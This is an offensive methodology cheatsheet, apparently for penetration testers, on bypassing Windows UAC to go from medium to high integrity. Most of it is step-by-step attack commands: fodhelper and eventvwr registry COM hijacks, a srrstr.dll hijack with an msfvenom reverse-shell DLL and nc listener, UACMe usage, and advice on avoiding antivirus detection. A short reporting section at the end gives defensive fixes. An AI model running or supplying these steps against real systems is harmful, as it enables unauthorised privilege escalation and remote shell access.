π‘οΈ Methodology Checklist
- Confirm user is in Administrators group:
whoami /groups - Check UAC level:
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin - If UAC enabled (value β 0): attempt bypass
- fodhelper COM hijack: write payload under HKCUβ¦\ms-settings\shell\open\command
- srrstr.dll hijack: plant x86 DLL in %USERPROFILE%\AppData\Local\Microsoft\WindowsApps
- Launch
SystemPropertiesAdvanced.exe(32-bit) to trigger srrstr.dll load - Verify elevated shell:
whoami /groupsβ check for Mandatory Label High
π― Operational Context
Use when: Local admin account obtained but running in medium integrity context β bypass UAC to achieve high integrity (SYSTEM-equivalent) without user prompt.
Think Dumber First: eventvwr.exe UAC bypass: set HKCU\Software\Classes\mscfile\shell\open\command to your payload β eventvwr.exe calls it at high integrity. Also try fodhelper.exe bypass. Both are one-liner registry bypasses.
Skip when: Already in high integrity process (check whoami /groups for Mandatory Label\High Mandatory Level) β no UAC bypass needed.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | Check UAC level (EnableLUA, ConsentPromptBehaviorAdmin) |
whoami /groups | find "Mandatory Level" | Verify current integrity level (Medium vs High) |
[System.Environment]::OSVersion.Version | Get build number β affects which bypass works |
cmd /c echo %WINDIR% | Confirm WindowsApps path in %PATH% |
icacls "C:\Program Files\WindowsApps" | Check if WindowsApps dir is writable |
msfvenom -p windows/shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f dll -o srrstr.dll | Generate x86 DLL for srrstr bypass (CRITICAL: must be x86) |
copy srrstr.dll "C:\Program Files\WindowsApps\srrstr.dll" | Place hijack DLL in writable PATH directory |
%SystemRoot%\SysWoW64\SystemPropertiesAdvanced.exe | Trigger auto-elevating binary that loads srrstr.dll |
UACMe | Tool with 60+ UAC bypass techniques (GitHub: hfiref0x/UACME) |
eventviper | PowerShell UAC bypass using Event Viewer COM hijack |
π¬ Deep Dive & Workflow
UAC Architecture
UAC Levels (reg query β ConsentPromptBehaviorAdmin):
0 = No prompt (disabled UAC)
1 = Prompt on secure desktop for credentials
2 = Prompt on secure desktop for confirmation
5 = Prompt for non-Windows binaries (DEFAULT)
EnableLUA = 1 β UAC enabled
EnableLUA = 0 β UAC disabled β no bypass needed
Integrity Levels:
Low β sandboxed (browser content)
Medium β standard user token
High β elevated/admin token
System β SYSTEM
Goal: Medium β High (bypass UAC prompt)
Bypass is only needed if: in Administrators group BUT running medium integrity
srrstr.dll DLL Hijack Bypass (Default Windows PATH)
# Step 1: Verify you're in Administrators but at medium integrity
whoami /groups | find "Mandatory Level"
# β Medium Mandatory Level β bypass needed
# Step 2: Check if WindowsApps is in PATH (it is by default on Win10)
cmd /c echo %PATH%
# β ...;C:\Program Files\WindowsApps;...
# Step 3: Verify writable
icacls "C:\Program Files\WindowsApps"
# β BUILTIN\Users:(RX) β might be writable with Administrators rights
# Step 4: CRITICAL β generate x86 DLL (SystemPropertiesAdvanced.exe is 32-bit)
msfvenom -p windows/shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f dll -o srrstr.dll
# β x86 (NOT x64) because SysWoW64\SystemPropertiesAdvanced.exe is 32-bit
# Step 5: Copy DLL to WindowsApps
copy srrstr.dll "C:\Program Files\WindowsApps\srrstr.dll"
# Step 6: Start listener on attacker
nc -lnvp [LPORT]
# Step 7: Execute auto-elevating binary
C:\Windows\SysWoW64\SystemPropertiesAdvanced.exe
# β Looks for srrstr.dll in PATH before System32
# β Loads our DLL with high integrity (auto-elevates without prompt)
# β Reverse shell at High integrity levelWhy x86: SystemPropertiesAdvanced.exe in SysWoW64 is a 32-bit binary. It loads 32-bit DLLs. An x64 DLL will silently fail to load.
Environment Verification Commands
# Confirm current integrity before bypass
[System.Security.Principal.WindowsIdentity]::GetCurrent().Claims | Where {$_.Type -like "*groups*"}
# Simpler check
whoami /groups | findstr "Mandatory Level"
# Should show Medium β need bypass
# After bypass β should show High
# Verify admin group
net localgroup administrators | findstr [USERNAME]Alternative UAC Bypasses
# fodhelper.exe (registry COM hijack) β reliable on Win10
New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Value "cmd.exe" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Start-Process "C:\Windows\System32\fodhelper.exe"
# Cleanup after
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
# eventviper (Event Viewer COM hijack)
# β Creates HKCU\Software\Classes\mscfile\shell\open\command
# β eventvwr.exe is auto-elevating β runs our command elevated
# UACMe (precompiled, many methods)
.\Akagi64.exe 33 cmd.exe # method 33 = fodhelper
.\Akagi64.exe 23 cmd.exe # method 23 = eventvwrUAC Bypass Decision Tree
1. whoami /groups β not in Administrators β need full privesc (not just UAC bypass)
2. In Administrators + Medium integrity:
β Check ConsentPromptBehaviorAdmin:
0 β already elevated, no bypass needed
1/2 β credential prompt β need creds (or another bypass method)
5 β DLL hijack / registry COM hijack works
3. Build < 17763 β many more bypasses available
4. Build β₯ 17763 β srrstr, fodhelper, eventviper reliably work
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| eventvwr bypass fails | Registry path already set or blocked | Try fodhelper: HKCU\Software\Classes\ms-settings\shell\open\command with DelegateExecute key |
| UAC set to Always Notify | Highest UAC setting | Most UAC bypasses fail at βAlways Notifyβ; may need physical access or find other privesc |
| Bypass registry writes but payload not executing | Timing issue or wrong path | Ensure payload is full absolute path; test manually first: write to reg, run eventvwr.exe |
| UAC bypass binary flagged by AV | Known bypass executables | Use PowerShell registry-based bypass via HKCU β no binary required |
| Medium integrity even as local admin | Split token (UAC) | Confirmed UAC behavior; all bypass techniques target this exact scenario |
π Reporting Trigger
Finding Title: UAC Bypass Elevates Local Admin to High Integrity Impact: UAC bypass technique converts medium-integrity local admin token to high-integrity SYSTEM-equivalent without prompting the user, enabling credential dumping, persistence installation, and all high-privileged operations that UAC was designed to gate. Root Cause: Windows UAC configured below maximum (Always Notify). Registry-based UAC bypass techniques exploit auto-elevation of trusted Windows binaries. Recommendation: Set UAC to highest level (Always Notify). Enforce admin accounts exclusively in high-integrity context. Limit local admin assignments. Consider removing local admin from workstation users β use LAPS for IT management and JIT admin elevation.